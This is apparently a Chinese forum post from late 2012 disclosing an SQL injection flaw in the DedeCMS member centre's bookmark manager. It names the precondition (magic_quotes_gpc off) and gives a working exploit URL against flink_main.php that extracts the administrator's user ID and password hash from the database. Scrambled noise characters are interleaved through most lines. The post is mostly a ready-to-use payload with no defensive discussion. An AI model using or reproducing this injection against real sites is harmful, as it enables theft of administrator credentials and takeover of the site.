DedeCMS会员中心SQL注射漏洞" D5 F! f" }" e: h
需要magic_quotes_gpc = Off1 e( K! ^8 i4 G3 F" j; o# r
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
3 C( K' }, Q1 H$ Q6 Y% h
, P0 X& Y8 C" i! c" TDedeCMS会员中心书签管理SQL注射漏洞
2 N: I. y3 z r/ Z' Y4 i1 d成功利用该漏洞可获得管理员密码
# U) {; I% M1 d. x6 J8 O
9 d( F( l4 ~4 z8 n. M会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
" |7 S$ o* @+ P6 A3 S 0 o3 C O0 k# K5 R# A0 ]
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
0 ~. x. d9 l5 X6 L |
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59